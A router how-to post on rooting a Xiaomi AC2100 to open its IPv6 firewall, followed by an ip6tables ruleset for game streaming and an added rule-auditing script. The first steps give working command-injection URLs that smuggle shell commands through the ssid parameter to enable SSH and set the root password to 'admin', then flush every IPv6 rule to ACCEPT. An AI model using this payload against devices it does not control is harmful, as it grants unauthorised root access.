Xiaomi Router AC2100: disabling the IPv6 firewall
Reference
https://github.com/AXFOX/openwrt-AC2100
Steps
- Log in to the router's web UI; the stok token is visible in the URL: http://192.168.31.1/cgi-bin/luci/;stok=???/web/home#router
- With that stok in place of ???, open the following two URLs in order:
  http://192.168.31.1/cgi-bin/luci/;stok=???/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
  http://192.168.31.1/cgi-bin/luci/;stok=???/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Aecho%20-e%20%27admin%5Cnadmin%27%20%7C%20passwd%20root%0A
- The two URLs above reset the root password through script injection; the new password is admin.
- SSH into the router: ssh root@192.168.31.1
- Then run: ip6tables -F; ip6tables -X; ip6tables -P INPUT ACCEPT; ip6tables -P OUTPUT ACCEPT; ip6tables -P FORWARD ACCEPT
Common problems
Unable to negotiate with 192.168.31.1 port 22: no matching host key type found. Their offer: ssh-rsa
Fix (the router's dropbear only offers an ssh-rsa host key, which newer OpenSSH clients refuse by default): ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa root@192.168.31.1
The commands above leave every IPv6 host on the LAN reachable from the internet, so for safety here are the rules I use to allow only Sunshine + Moonlight streaming:
#!/bin/sh
# ======================
# 1. Parameters
# ======================
# Ports required by Sunshine + Moonlight
# TCP: 47984, 47989:47990, 47998:48000, 48010, 53333
# UDP: 47984, 47998:48000, 48010
# The ranges above are expanded into individual ports for the loops below.
PORTS_TCP="47984 47989 47990 47998 47999 48000 48010 53333"
PORTS_UDP="47984 47998 47999 48000 48010"
# Name of the router's WAN interface
WAN_INTERFACE="pppoe-wan"
# Name of the LAN bridge interface
LAN_INTERFACE="br-lan"
# ======================
# 2. Flush old rules (useful while testing)
# ======================
ip6tables -F
ip6tables -X
ip6tables -Z
# ======================
# 3. Base policy
# ======================
# Default policy: allow outgoing traffic, drop incoming and forwarded traffic
ip6tables -P INPUT DROP
ip6tables -P FORWARD DROP
ip6tables -P OUTPUT ACCEPT
# ======================
# 4. Hardening (placed before any ACCEPT rule so these packets never reach one)
# ======================
# Drop invalid packets
ip6tables -A INPUT -m conntrack --ctstate INVALID -j DROP
ip6tables -A FORWARD -m conntrack --ctstate INVALID -j DROP
# Drop new connections that start with SYN+ACK instead of a plain SYN
ip6tables -A FORWARD -p tcp --tcp-flags SYN,ACK SYN,ACK -m conntrack --ctstate NEW -j DROP
# ======================
# 5. Traffic IPv6 cannot work without
# ======================
# Allow established and related connections
ip6tables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
ip6tables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
# Allow loopback
ip6tables -A INPUT -i lo -j ACCEPT
# Allow ICMPv6 (neighbour discovery, router advertisements)
ip6tables -A INPUT -p icmpv6 -j ACCEPT
# Forwarded ICMPv6 is needed as well: without it Packet Too Big messages are
# dropped, path MTU discovery fails and large streaming packets stall
ip6tables -A FORWARD -p icmpv6 -j ACCEPT
# ======================
# 6. Sunshine + Moonlight port rules
# ======================
# Note: these rules accept the ports for every LAN host. To limit them to the
# streaming PC, add "-d <its IPv6 address>" to each rule.
# Loop over the TCP ports and allow traffic from the internet to be forwarded to the LAN
for port in $PORTS_TCP; do
  # Forward from WAN to LAN, destination port = Sunshine TCP port
  ip6tables -A FORWARD -i "$WAN_INTERFACE" -o "$LAN_INTERFACE" -p tcp --dport "$port" -j ACCEPT
done
# Loop over the UDP ports and allow traffic from the internet to be forwarded to the LAN
for port in $PORTS_UDP; do
  # Forward from WAN to LAN, destination port = Sunshine UDP port
  ip6tables -A FORWARD -i "$WAN_INTERFACE" -o "$LAN_INTERFACE" -p udp --dport "$port" -j ACCEPT
done
# Allow UPnP / NAT-PMP port-mapping traffic (only if Sunshine is configured to use UPnP).
# Caveat: this exposes SSDP (1900) and NAT-PMP/PCP (5351) on every LAN host to the
# internet; remove these two lines if UPnP is not in use.
ip6tables -A FORWARD -i "$WAN_INTERFACE" -o "$LAN_INTERFACE" -p udp --dport 1900 -j ACCEPT
ip6tables -A FORWARD -i "$WAN_INTERFACE" -o "$LAN_INTERFACE" -p udp --dport 5351 -j ACCEPT
echo "IPv6 Sunshine firewall rules have been applied successfully."
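After applying a ruleset like the one above it is worth verifying that the FORWARD chain really only has the intended holes, since a leftover rule from the "flush everything" step or a typo in a port list silently widens exposure. The following is an added example, my own code and not from the post or the openwrt-AC2100 project: a POSIX sh/awk auditor that reads the output of `ip6tables -S FORWARD` from a file and reports a policy other than DROP, any ACCEPT with a destination port outside the Sunshine/Moonlight list (port ranges are expanded), and any interface-based ACCEPT with no port, no conntrack state and no ICMPv6 match, which is the shape of rule that lets everything through. It assumes the post's interface names and port lists; the function name, the sample rule dump (constructed to look like `ip6tables -S` output) and the stray port-22 rule are mine. The UPnP ports 1900 and 5351 are deliberately not on the allow list, so the post's two UPnP rules would be reported as well, which is the point of the check.

```shell
#!/bin/sh
# Added example (not from the original post): audit an ip6tables FORWARD dump
# and report anything that opens more than the Sunshine/Moonlight ports.
# Written in POSIX sh + awk so it can also run under busybox on the router.
# Assumed from the post: interface names pppoe-wan / br-lan and the port lists.

ALLOWED_TCP="47984 47989 47990 47998 47999 48000 48010 53333"
ALLOWED_UDP="47984 47998 47999 48000 48010"

# audit_forward_rules FILE
# FILE holds the output of `ip6tables -S FORWARD`. Prints one line per finding;
# returns 0 when the chain is clean and 1 when there is at least one finding.
audit_forward_rules() {
    awk -v tcp="$ALLOWED_TCP" -v udp="$ALLOWED_UDP" '
    BEGIN {
        n = split(tcp, a, " "); for (i = 1; i <= n; i++) ok["tcp", a[i]] = 1
        n = split(udp, a, " "); for (i = 1; i <= n; i++) ok["udp", a[i]] = 1
        bad = 0
    }
    # The chain policy must be DROP, otherwise the port rules are decorative
    $1 == "-P" && $2 == "FORWARD" && $3 != "DROP" {
        print "policy: FORWARD is " $3 ", expected DROP"; bad++
    }
    $1 == "-A" && $2 == "FORWARD" {
        proto = ""; dport = ""; target = ""; inif = ""
        for (i = 3; i <= NF; i++) {
            if ($i == "-p") proto = $(i + 1)
            if ($i == "--dport") dport = $(i + 1)
            if ($i == "-j") target = $(i + 1)
            if ($i == "-i") inif = $(i + 1)
        }
        if (target != "ACCEPT") next
        if (dport != "") {
            # "lo:hi" ranges are expanded and every port checked against the list
            m = split(dport, r, ":")
            lo = r[1] + 0; hi = (m > 1) ? r[2] + 0 : lo
            for (p = lo; p <= hi; p++)
                if (!ok[proto, p]) { print "unexpected port: " $0; bad++; break }
            next
        }
        # An interface-based ACCEPT with no port, no conntrack state and no
        # ICMPv6 match forwards everything, like `ip6tables -P FORWARD ACCEPT` did
        if (inif != "" && proto != "icmpv6" && proto != "ipv6-icmp" && $0 !~ /--ctstate/) {
            print "unrestricted: " $0; bad++
        }
    }
    END { exit (bad > 0) }
    ' "$1"
}

# Constructed sample of what `ip6tables -S FORWARD` prints after the post's
# script, plus one stray rule that opens SSH from the WAN to the whole LAN.
demo() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
-P FORWARD DROP
-A FORWARD -m conntrack --ctstate INVALID -j DROP
-A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -p ipv6-icmp -j ACCEPT
-A FORWARD -i pppoe-wan -o br-lan -p tcp -m tcp --dport 47984 -j ACCEPT
-A FORWARD -i pppoe-wan -o br-lan -p udp -m udp --dport 47998:48000 -j ACCEPT
-A FORWARD -i pppoe-wan -o br-lan -p tcp -m tcp --dport 22 -j ACCEPT
EOF
    if audit_forward_rules "$f"; then echo "ruleset clean"; else echo "ruleset needs attention"; fi
    rm -f "$f"
}
demo
```

On the router itself the same function can be fed live state with `ip6tables -S FORWARD > /tmp/fwd.txt; audit_forward_rules /tmp/fwd.txt`; a non-zero exit code makes it usable from a cron job or a post-boot hook that re-applies the ruleset when something has drifted.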
Check your public IPv6 address
curl -6 https://ident.me
curl -6 https://api6.ipify.org